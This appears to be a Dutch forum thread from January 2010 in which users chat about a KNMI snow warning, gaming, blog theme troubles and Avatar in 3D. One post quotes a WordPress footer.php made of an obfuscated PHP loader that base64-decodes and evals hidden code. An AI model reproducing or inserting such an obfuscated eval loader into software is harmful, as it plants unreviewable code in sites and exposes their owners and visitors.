quote:Op zaterdag 9 januari 2010 09:12 schreef Bastard het volgende:
[..]
Ik zeg het nog maar een keer: "Ik speel savonds, en niet snaschts, dan slaap ik"
Dus tegen 12 ging die uit ja.
Ja dat gezeur altijd "ik zie je vanavond wel online " en dan snachts aanzetten en verbaasd zijn.quote:
Hoe fucking koud was het in 97 dan dat er toen wel elfstedentocht gereden kon wordenquote:Op zaterdag 9 januari 2010 09:14 schreef Chocobo het volgende:
KNMI waarschuwingen,... extreem weer,.... minder treinen,.... sterke wind,.... kustprovincies fucked,... sneeuwstormen,... sneeuwduinen,... -15
Nou, ben benieuwd
Oh was dat de achtergrond! Ja, dan geef ik je opzekers gelijk. Zie je vanavond ookquote:Op zaterdag 9 januari 2010 09:17 schreef Bastard het volgende:
[..]
Ja dat gezeur altijd "ik zie je vanavond wel online " en dan snachts aanzetten en verbaasd zijn.
Ja flikt ie wel vaker, komt ie 12 uur of later online. "je ging net weg? " ... ja duh, heb de hele avond wel gespeeld hoor.quote:Op zaterdag 9 januari 2010 09:19 schreef Chocobo het volgende:
[..]
Oh was dat de achtergrond! Ja, dan geef ik je opzekers gelijk. Zie je vanavond ook![]()
En dan een post midden in de nacht met waar je blijft
Auto wassen ookquote:Op zaterdag 9 januari 2010 09:19 schreef Bastard het volgende:
[..]
Hoe fucking koud was het in 97 dan dat er toen wel elfstedentocht gereden kon worden
En vroerger.. ging ik ook gewoon buiten spelen met een majo onder mn broek, 2 truien aan en kranten in mn laarzen.
Gewoon auto wassen zo dus.
quote:Op zaterdag 9 januari 2010 09:14 schreef Chocobo het volgende:
KNMI waarschuwingen,... extreem weer,.... minder treinen,.... sterke wind,.... kustprovincies fucked,... sneeuwstormen,... sneeuwduinen,... -15
Nou, ben benieuwd
Af en toe lichte sneeuwquote:Op zaterdag 9 januari 2010 09:25 schreef Strolie75 het volgende:
[..]
[ afbeelding ]
Af en toe lichte sneeuw is extreem.![]()
KNMI en hun weer alarmen.
[ afbeelding ]
Het is ook geen weeralarm, het is een voorwaarschuwing. De sneeuw in combinatie met de harde wind maakt het niet echt lekker weer buitenquote:Op zaterdag 9 januari 2010 09:25 schreef Strolie75 het volgende:
[..]
[ afbeelding ]
Af en toe lichte sneeuw is extreem.![]()
KNMI en hun weer alarmen.
[ afbeelding ]
Waarschuwing, voorwaarschuwing, weeralarm, dat is toch niet te begrijpen voor de gewone Tokkie in NL?quote:Op zaterdag 9 januari 2010 09:36 schreef kepler het volgende:
[..]
Het is ook geen weeralarm, het is een voorwaarschuwing. De sneeuw in combinatie met de harde wind maakt het niet echt lekker weer buiten
Zeg dat dan! In plaats van paniekerig te doen met extremen!quote:Op zaterdag 9 januari 2010 09:36 schreef kepler het volgende:
Het is ook geen weeralarm, het is een voorwaarschuwing. De sneeuw in combinatie met de harde wind maakt het niet echt lekker weer buiten
Ze moeten laten zien dat ze hun subsidie waard zijn... wij normale hollanders zijn daar toch te nuchter voor Henk.quote:Op zaterdag 9 januari 2010 09:37 schreef Notorious_Roy het volgende:
[..]
Waarschuwing, voorwaarschuwing, weeralarm, dat is toch niet te begrijpen voor de gewone Tokkie in NL?
Precies. Een weersVERWACHTING hoort er wel bij, zodat je eventueel iets kunt plannen de dag erna. "in de loop van de middag sneeuw en koude wind" en dan beslis je dat je in de ochtend je boodschappen gaat doen.quote:Op zaterdag 9 januari 2010 09:49 schreef Bastard het volgende:
[..]
Ze moeten laten zien dat ze hun subsidie waard zijn... wij normale hollanders zijn daar toch te nuchter voor Henk.
Als je buiten bent zeg je... het is koud ik ga naar binnen, of ik blijf buiten. Komt geen KNMI aan te pas.
http://twitter.com/quote:Op zaterdag 9 januari 2010 11:19 schreef Strolie75 het volgende:
Dragon God (2-3) is dood.
Even 4-2 afmaken en dan verder met 1-3.
quote:Op zaterdag 9 januari 2010 09:12 schreef Bastard het volgende:
[..]
Ik zeg het nog maar een keer: "Ik speel savonds, en niet snaschts, dan slaap ik"
Dus tegen 12 ging die uit ja.
Wasstraat?quote:Op zaterdag 9 januari 2010 13:14 schreef Bastard het volgende:
Auto wassen
Ik was de enige natuurlijk, en eerst lekker afspuiten met warm water.. toen met een spons er overheen, was het alweer bevroren
Afspoelen dan maar met water, en snel droog rijden, ijspegels hangen er aan
Ja ik dacht als ik snel ben lukt het wel... niet dusquote:Op zaterdag 9 januari 2010 13:21 schreef gijsje79 het volgende:
[..]
Wasstraat?
In zo'n box heeft het nu geen zin he.
quote:Op zaterdag 9 januari 2010 09:44 schreef Strolie75 het volgende:
[..]
Zeg dat dan! In plaats van paniekerig te doen met extremen!
Ze zullen wel willen compenseren dat ze woensdag de plank mis hebben geslagen.
Het is gewoon extreem moeilijk. Die buien van woensdag (donderdag?) waren tamelijk onverwacht in sterkte. Daar waren ze te laat, en daar werd over geklaagd. Nu zijn ze te vroeg volgens veel mensen... Het is ook nooit goedquote:Het KNMI heeft vrijdagavond een voorwaarschuwing extreem weer afgegeven voor zaterdag. In de avond zal het naar verwachting in het hele land sneeuwen.
Ben heel benieuwd naar je ervaring!quote:Op zaterdag 9 januari 2010 20:06 schreef Strolie75 het volgende:
Nu bij de Halo smurfen film, ik ben benieuwd!
Nog een waarschuwingquote:Op zaterdag 9 januari 2010 20:18 schreef kepler het volgende:
[..]
[..]
Het is gewoon extreem moeilijk. Die buien van woensdag (donderdag?) waren tamelijk onverwacht in sterkte. Daar waren ze te laat, en daar werd over geklaagd. Nu zijn ze te vroeg volgens veel mensen... Het is ook nooit goed
En als ik de berichten hoor over het Noorden van Nederland is de weerwaarschuwing echt terechtZelfs hier was het aardig glad op de weg
quote:Op zaterdag 9 januari 2010 21:40 schreef Chocobo het volgende:
[..]
Nog een waarschuwing
AMSTERDAM - Het KNMI heeft zaterdagavond een weeralarm uitgegeven vanwege sneeuwjacht. Het alarm geldt alleen in de provincies Groningen, Friesland, Drenthe en Noord-Holland. Voor de rest van het land geldt nog steeds de voorwaarschuwing voor extreem weer, die het KNMI vrijdag uitgaf.
Los daarvan bestaat het KNMI alleen zodat er op gescholden kan worden. Luister eigenlijk nooit naar ze. Wel lief hoor die waarschuwingen, maar ik bepaal zelf wel wat ik doe. Sowieso luistert eigenlijk niemand naar ze,... altijd files voor waarschuwingen!
Ik kijk er altijd wel naar, goede indicatiequote:Op zaterdag 9 januari 2010 21:40 schreef Chocobo het volgende:
[..]
Nog een waarschuwing
AMSTERDAM - Het KNMI heeft zaterdagavond een weeralarm uitgegeven vanwege sneeuwjacht. Het alarm geldt alleen in de provincies Groningen, Friesland, Drenthe en Noord-Holland. Voor de rest van het land geldt nog steeds de voorwaarschuwing voor extreem weer, die het KNMI vrijdag uitgaf.
Los daarvan bestaat het KNMI alleen zodat er op gescholden kan worden. Luister eigenlijk nooit naar ze. Wel lief hoor die waarschuwingen, maar ik bepaal zelf wel wat ik doe. Sowieso luistert eigenlijk niemand naar ze,... altijd files voor waarschuwingen!
1 2 | $o="QAAAJztjbnEnZGtmdHQ6JWRrYgIOZnUlOTsoAUA5Cg0ODgBBAOMAwQpgDA0AIQMSbmM6JWFoaHNiAvABUnR3IEBmaQR1YWtiYXMlBBFDYnRuYGkAACc7ZidvdWJhOiVvc3N3PSgAAChwcHApY250ZGhyaXNpYnAAAGZpY3J0YmNlaGhsdClkaGoAICglJzlBdWJiJ0UBITsoZjknDYUKDTsoBjEFUDsAgQa2dW5gbwbCJwAQAAxEaGNiJ3Ryd3dodXMHXwdQdWIAgHFuYnBsbmlgBpN0bnNidChqAAJqaFhgaGtjWGBybmNidAfgSgmwSkgnQAEgJ0ABIggxKwUfBRBzZmtsxAkFUwURKXJsC8FSTCdQYmUFwSdVBxJgAnQEHxB1d29oaWJraGhscncPtVef7QExJ0sBQgORD8YY8ADBGdEAsBiCZBufEjAOABKAQQLJOHdvdydwd1gbQy8uPCc4AoACGzsoZWhjfgCSb3NqaxZxFGAnFuAAcQ==";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?> |
quote:Op zaterdag 9 januari 2010 23:00 schreef Notorious_Roy het volgende:
Mijn huidige footer.php
[ code verwijderd ]
Ik dacht slim te zijn en gewoon mijn oude footer te gebruiken, maar dat werkt nietquote:Op zaterdag 9 januari 2010 23:05 schreef kepler het volgende:
[..]ik had hetzelfde probleem
Succes met googlen
Netjes Gijs!quote:Op zaterdag 9 januari 2010 23:19 schreef Notorious_Roy het volgende:
Ha! Fixed! Thank you Google!
(En Sjo voor het opmerken ervan, ik had het zelf niet eens gezien)
315 denk ik, zal er eens eentje veranderen.quote:Op zaterdag 9 januari 2010 23:42 schreef Chocobo het volgende:
Maak de plaatjes van nieuwe artikelen anders dan in dezelfde width als je tekst,... wat is het,... 500 ofzo?
Waarom moeilijk doen als het ook makkelijk en gratis kanquote:Op zaterdag 9 januari 2010 23:48 schreef Ker_Plunk het volgende:
CMS gebruikers
Gewoon lekker zelf bouwen
Heel makkelijk is het anders ook nietquote:Op zaterdag 9 januari 2010 23:52 schreef kepler het volgende:
[..]
Waarom moeilijk doen als het ook makkelijk en gratis kan
Wat is je probleem dan?quote:Op zaterdag 9 januari 2010 23:55 schreef Notorious_Roy het volgende:
[..]
Heel makkelijk is het anders ook niet
quote:Op zaterdag 9 januari 2010 23:48 schreef Ker_Plunk het volgende:
CMS gebruikers
Gewoon lekker zelf bouwen
Jij klootzak!quote:
SPOILEROm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.The hardware is just a box you buy only because you want to play Mario games - Yamauchi
Mr. Zurkon doesn't need bolts, his currency is pain
Roy-O-Rama | Backlog | Wish-list
Nee joh piemel,... je pics zijn nu 300! Gebruik 500 eens! Zo trek je de witte ruimtes naast de plaatjes weg uit je artikelen.quote:Op zaterdag 9 januari 2010 23:49 schreef Notorious_Roy het volgende:
[..]
315 denk ik, zal er eens eentje veranderen.
quote:Op zaterdag 9 januari 2010 23:58 schreef Notorious_Roy het volgende:
[..]
Jij klootzak!Gebruik Firebug in Firefox,... kan je precies zien met 'inspect' waar wat staat. Tevens pre-load aanpassingen on the fly!SPOILEROm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.A discovery is said to be an accident meeting a prepared mind.
Theme-verhuizing is altijd pittig. Vaak is het het beste om posts opnieuw te copy pasten in een goede layout. Dit soort migraties vragen veel tijd en geduldquote:Op zaterdag 9 januari 2010 23:55 schreef Notorious_Roy het volgende:
[..]
Heel makkelijk is het anders ook niet
Wordpress heerst!quote:Op zaterdag 9 januari 2010 23:52 schreef kepler het volgende:
[..]
Waarom moeilijk doen als het ook makkelijk en gratis kan
Mijn blog heeft me vele uren gekost om het zo te krijgenquote:Op zondag 10 januari 2010 00:06 schreef Chocobo het volgende:
Mijn broer doet iets met Drupal ofzo,... maar ja,... hij weet waar hij mee bezig is. Wij hobby'en aan
Jij zou meer hits krijgen als je de id- pagina's vervangt met naam url's! Voor de rest vind ik jou blog heerlijk om te zien. Rustig,... fijne font,... echt heerlijk!quote:Op zondag 10 januari 2010 00:10 schreef kepler het volgende:
[..]
Mijn blog heeft me vele uren gekost om het zo te krijgen
Vooral die vlaggetjes was een probleem![]()
Iets meer respect voor hardcodersquote:
ach gaat me niet eens om de hits. Binnenkort komt het verslag van Noorwegen, en dat is voorlopig de laatste denk ik zo helaasquote:Op zondag 10 januari 2010 00:12 schreef Chocobo het volgende:
[..]
Jij zou meer hits krijgen als je de id- pagina's vervangt met naam url's! Voor de rest vind ik jou blog heerlijk om te zien. Rustig,... fijne font,... echt heerlijk!
Als ik het zou kunnen zou ik het doenquote:Op zondag 10 januari 2010 00:16 schreef Ker_Plunk het volgende:
[..]
Iets meer respect voor hardcodersZie soms site's van klanten…herken meteen dat een van wordpress of zelfs joomla komt… professionaliteit…gone
Moet me ontwerp 100% onder controle en heel vaak is dat moeilijk of omslachtig met dit soort modules.
Check nu eens, heb het iets aangepast. Ik vind het wel mooi als er tekst om de plaatjes heen staatquote:Op zondag 10 januari 2010 00:00 schreef Chocobo het volgende:
[..]
Nee joh piemel,... je pics zijn nu 300! Gebruik 500 eens! Zo trek je de witte ruimtes naast de plaatjes weg uit je artikelen.
Al mee bezig idd, op aanraden van Kepler. Moet er alleen ook nog wel ff mee om leren gaan. Dit is allemaal nieuwquote:Op zondag 10 januari 2010 00:01 schreef Chocobo het volgende:
[..]
Gebruik Firebug in Firefox,... kan je precies zien met 'inspect' waar wat staat. Tevens pre-load aanpassingen on the fly!
Vertel mij wat. Dit wist ik nietquote:Op zondag 10 januari 2010 00:02 schreef Chocobo het volgende:
[..]
Theme-verhuizing is altijd pittig. Vaak is het het beste om posts opnieuw te copy pasten in een goede layout. Dit soort migraties vragen veel tijd en geduldAndere CSS kan zoveel impact hebben
Ken zelf html en css en een beetje van dit en dat. ASP.NET ook wel redelijk alleen de scripttaal blijft lastig (C# / Visual Basic), dit moet je vaak oefenen en kan soms zoooo frustrerend zijnquote:Op zondag 10 januari 2010 00:19 schreef kepler het volgende:
[..]
Als ik het zou kunnen zou ik het doen![]()
Ik kan het alleen niet en heeft geen zin om het te leren ook
Nee,... niet als hobby inderdaad. Werkt prima zo,... moet wel leuk blijven natuurlijk.quote:Op zondag 10 januari 2010 00:19 schreef kepler het volgende:
[..]
Als ik het zou kunnen zou ik het doen![]()
Ik kan het alleen niet en heeft geen zin om het te leren ook
Ik zie geen brede pics in je artikelen,... kleine 300 pics en rechts ervan is alles wit. http://www.royorama.nl/?p=1442 Ook heb jij ID's net als Kepler had,... naam url's werken uiteraard beter voor Google en staat netter.quote:Op zondag 10 januari 2010 00:21 schreef Notorious_Roy het volgende:
[..]
Check nu eens, heb het iets aangepast. Ik vind het wel mooi als er tekst om de plaatjes heen staat
Let wel op dat mijn oude blogs problemen geven. Die had een aparte manier van plaatjes posten, dus dat ziet er nu niet uit. Mn V2 blog is zoals het gaat worden.
[..]
Al mee bezig idd, op aanraden van Kepler. Moet er alleen ook nog wel ff mee om leren gaan. Dit is allemaal nieuw
[..]
Vertel mij wat. Dit wist ik nietMaar het wordt wel stapje voor stapje stukken mooier.
Nieuwe header en nieuwe kopjes boven featured en video en het is ook al weer stukken beter.
Naam URLs kan ik ook aanzetten. Is dat verder geen probleem ofzo?
Ik ben ook zoooo blij met hulp. Kepler op MSN, Sjo hier. Anders had ik het allang opgegeven
Precies wat ik bedoel, die blog is geschreven in m'n oude theme nog. Al die plaatjes hebben een andere HTML code die ik niet allemaal ga aanpassenquote:Op zondag 10 januari 2010 00:29 schreef Chocobo het volgende:
[..]
Ik zie geen brede pics in je artikelen,... kleine 300 pics en rechts ervan is alles wit. http://www.royorama.nl/?p=1442 Ook heb jij ID's net als Kepler had,... naam url's werken uiteraard beter voor Google en staat netter.
Thnxquote:De index vind ik persoonlijk al stukken beter.
Ze kunnen het gewoon niet daar!! Dat is het punt wel een beetje.quote:Op zaterdag 9 januari 2010 20:18 schreef kepler het volgende:
[..]
[..]
Het is gewoon extreem moeilijk. Die buien van woensdag (donderdag?) waren tamelijk onverwacht in sterkte. Daar waren ze te laat, en daar werd over geklaagd. Nu zijn ze te vroeg volgens veel mensen... Het is ook nooit goed
En als ik de berichten hoor over het Noorden van Nederland is de weerwaarschuwing echt terechtZelfs hier was het aardig glad op de weg
Aan de andere kant kan Geenstijl zich fouten veroorloven onder heb mom van 'kudt,... we hadden het fout,.. sliepuit enzo'. Maar nu sneeuwt het hier weer,.... heerlijkquote:Op zondag 10 januari 2010 07:14 schreef Bastard het volgende:
[..]
Ze kunnen het gewoon niet daar!! Dat is het punt wel een beetje.
Op geenstijl las ik woensdagmiddag dat het flink zou gaan sneeuwen, duurde nog uren eer ik het KNMI daar iets hoorde over zeggen, ja tijdens de spits toen het al te laat was
En dat is niet 1x maar een aantal keer in de week..
Beter dan global warmingquote:Op zondag 10 januari 2010 10:10 schreef Strolie75 het volgende:
Hier ook lichte vlokken. Gelukkig niet meer zo'n harde wind.
Paniekerig gedoe om niks. Strooizouttekort, extreem weer, sneeuwstormen. Media heeft weer een hype gevonden hoor.
SBS6 volk.quote:Op zondag 10 januari 2010 10:18 schreef Strolie75 het volgende:
Altijd maar kankeren op de Amerikanse media, maar hier zijn ze intussen net zo goed in overdrijven en angst aanjagen.
Ik zag de Telegraaf gisteren proberen om een nieuwe burgerrel te hypen in een ander plaatsje. Lukte niet,... volgens mij vonden ze dat Culemborg wel wat.quote:Op zondag 10 januari 2010 10:10 schreef Strolie75 het volgende:
Hier ook lichte vlokken. Gelukkig niet meer zo'n harde wind.
Paniekerig gedoe om niks. Strooizouttekort, extreem weer, sneeuwstormen. Media heeft weer een hype gevonden hoor.
Inderdaad!quote:Op zondag 10 januari 2010 10:45 schreef Strolie75 het volgende:
Ik sprak gister mijn oma. Mensje is 82. Snapt er niks meer van. Vroeger keken ze naar buiten en trokken ze een extra trui aan. En dat waren heftigere winters als nu!
Ik weet nog goed dat ik die missie speelde ja!quote:Op zondag 10 januari 2010 10:48 schreef Chocobo het volgende:
[..]
Inderdaad!Dat huilen van tegenwoordig!
De winters in de 2e Wereldoorlog bv,... zonder eten! Dat is pas een ervaring,...
Fantastisch Gijs. Echt geweldig!quote:Op zaterdag 9 januari 2010 21:34 schreef Chocobo het volgende:
[..]
Ben heel benieuwd naar je ervaring!
Op geenstijl roepen ze wel vaker zulke dingen, maar als dat niet uitkomt hoor je daar niks over. Zo riepen ze nog dat het komende week -15 gaat worden overdag gebaseerd op een Amerikaans Simulatiemodelquote:Op zondag 10 januari 2010 07:14 schreef Bastard het volgende:
[..]
Ze kunnen het gewoon niet daar!! Dat is het punt wel een beetje.
Op geenstijl las ik woensdagmiddag dat het flink zou gaan sneeuwen, duurde nog uren eer ik het KNMI daar iets hoorde over zeggen, ja tijdens de spits toen het al te laat was
En dat is niet 1x maar een aantal keer in de week..
Ik vond dat 3D echt niks toevoegen bij Ice Age 3quote:Op zondag 10 januari 2010 11:02 schreef Strolie75 het volgende:
[..]
Fantastisch Gijs. Echt geweldig!
Verhaal is niet heel erg origineel, maar wel boeiend. Ik heb me die 3 uur lang in elk geval niet verveelt. Denk aan The New World/Pocahontas of Dance with Wolves. Sowiezo zet Cameron weer een fantastische wereld neer. Personages, technologie, flaura en fauna. Overal is over nagedacht. Alles is super gedetailleerd.
Maar voorop staat de uitwerking...de uitwerking. Oh mijn god...als dit de toekomst van films is zit ik binnenkort wekelijks weer in de bioscoop. Je moet deze film in 3D op een Imax-scherm zien. Je bekt valt open. Echt open. 3D is geen gimmick meer maar de toekomst. Het voegt echt iets toe aan de film. Ik denk dat mensen ook zo reageerde toen acteurs opeens gingen praten of toen de kleurenfilm verscheen. Het is niet meer zo simpel dat je af en toe iets voor je neus ziet zweven. Het is geeft een extra dimensie aan het beeld. Je ziet continu diepte. Acteurs, object. Ze zijn gelaagd. Daarnaast gaan CGI en echte acteurs/sets nadeloos in elkaar over.
[ afbeelding ]
Zal zat vol. Eerste 5 minuten was het " oooooeeeee" en "aaaaaaaah". Daarna heb ik 3 uur lang niks gehoord. Geen piep. Niks.![]()
![]()
Klinkt geweldig Gijs,... maar ben je niet wat kleuren kwijt als je 3D gaat kijken. Het blijft een wazig iets altijd vind ik,... of is de techniek verbeterd. Nieuwe toekomst denk ik,... thuis TV in 3Dquote:Op zondag 10 januari 2010 11:02 schreef Strolie75 het volgende:
[..]
Fantastisch Gijs. Echt geweldig!
Verhaal is niet heel erg origineel, maar wel boeiend. Ik heb me die 3 uur lang in elk geval niet verveelt. Denk aan The New World/Pocahontas of Dance with Wolves. Sowiezo zet Cameron weer een fantastische wereld neer. Personages, technologie, flaura en fauna. Overal is over nagedacht. Alles is super gedetailleerd.
Maar voorop staat de uitwerking...de uitwerking. Oh mijn god...als dit de toekomst van films is zit ik binnenkort wekelijks weer in de bioscoop. Je moet deze film in 3D op een Imax-scherm zien. Je bekt valt open. Echt open. 3D is geen gimmick meer maar de toekomst. Het voegt echt iets toe aan de film. Ik denk dat mensen ook zo reageerde toen acteurs opeens gingen praten of toen de kleurenfilm verscheen. Het is niet meer zo simpel dat je af en toe iets voor je neus ziet zweven. Het is geeft een extra dimensie aan het beeld. Je ziet continu diepte. Acteurs, object. Ze zijn gelaagd. Daarnaast gaan CGI en echte acteurs/sets nadeloos in elkaar over.
[ afbeelding ]
Zal zat vol. Eerste 5 minuten was het " oooooeeeee" en "aaaaaaaah". Daarna heb ik 3 uur lang niks gehoord. Geen piep. Niks.![]()
![]()
Als ik al naar de bioscoop ga, is het naar Tuschinski of naar Leiden. Daar heb je 2 bioscopen.quote:
Dit is een hele nieuwe techniek...uitgevonden door Cameron zelf. Kun je niet voorstellen met de bestaande 3D techniek zoals je die met rood/groene brillen, eerdere films of in pretparken ziet. Film is enorm kleurrijk. Zoals die planeet in beeld is gebracht. Het spat echt van je scherm af!quote:Op zondag 10 januari 2010 11:07 schreef Chocobo het volgende:
Klinkt geweldig Gijs,... maar ben je niet wat kleuren kwijt als je 3D gaat kijken. Het blijft een wazig iets altijd vind ik,... of is de techniek verbeterd. Nieuwe toekomst denk ik,... thuis TV in 3D
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |